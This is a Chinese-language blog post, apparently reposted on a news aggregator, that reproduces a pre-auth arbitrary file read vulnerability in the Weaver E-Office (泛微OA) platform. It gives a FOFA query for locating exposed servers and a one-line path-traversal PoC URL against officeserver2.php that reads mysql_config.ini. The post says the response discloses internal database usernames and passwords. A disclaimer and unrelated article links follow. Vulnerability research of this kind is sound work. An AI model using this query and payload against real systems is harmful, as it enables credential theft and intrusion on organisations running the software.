当前位置: 首页 > news >正文

E-Office(泛微OA)前台任意文件读取漏洞复现

news 2025/8/16 1:39:04

简介

泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。在该产品前台登录页存在文件读取漏洞。

officeserver.php文件存在任意文件读取漏洞,通过漏洞可以下载服务器上的任意文件。

漏洞复现

FOFA语法:

app="泛微-EOffice" && icon_hash="1578525679"

访问后页面如下:

POC:

/iweboffice/officeserver2.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../../bin/mysql_config.ini

响应返回页面获取到内网区域数据库用户名和密码

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

http://www.lryc.cn/news/218478.html

相关文章:

  • 前端小案例 | 喵喵大王立大功 | 一个带便利贴功能的todolist面板
  • 算法训练营第十一天 | 20. 有效的括号、 1047. 删除字符串中的所有相邻重复项、150. 逆波兰表达式求值
  • Python unittest单元测试框架 TestSuite测试套件
  • FSB逮捕为乌克兰网络部队工作的俄罗斯黑客
  • 【PC电脑windows-学习样例tusb_serial_device-ESP32的USB模拟串口程序+VScode建立工程+usb组件添加+-基础样例学习】
  • LeetCode75——Day26
  • 面试算法53:二叉搜索树的下一个节点
  • 2023SHCTF web方向wp
  • 从物理磁盘到数据库 —— 存储IO链路访问图
  • 基于java+springboot+vue在线选课系统
  • GO学习之 同步操作sync包
  • NUUO网络摄像头(NVR)RCE漏洞复现
  • 一款快速获取目标网站关键信息的工具
  • 将GC编程语言引入WebAssembly的新方法
  • 微信小程序UI自动化测试实践:Minium+PageObject
  • Java零基础入门-输入与输出
  • iOS报错命名空间“std”中的“unary_function”
  • Flink SQL 窗口聚合详解
  • 中间件redis的使用
  • Why delete[] array when deepcopying with “=“?
  • curl(六)DNS解析、认证、代理
  • (免费领源码)PHP#MySQL高校学生信息管理系统28099-计算机毕业设计项目选题推荐
  • [动态规划] (四) LeetCode 91.解码方法
  • Vue Vuex的使用和原理 专门解决共享数据的问题
  • 第九周实验记录
  • STM32WB55开发(6)----FUS更新
  • centos关闭Java进程的脚本
  • 深度学习网络模型 MobileNet系列MobileNet V1、MobileNet V2、MobileNet V3网络详解以及pytorch代码复现
  • Spring 中 BeanFactory 和 FactoryBean 有何区别?
  • 黑马程序员项目-黑马点评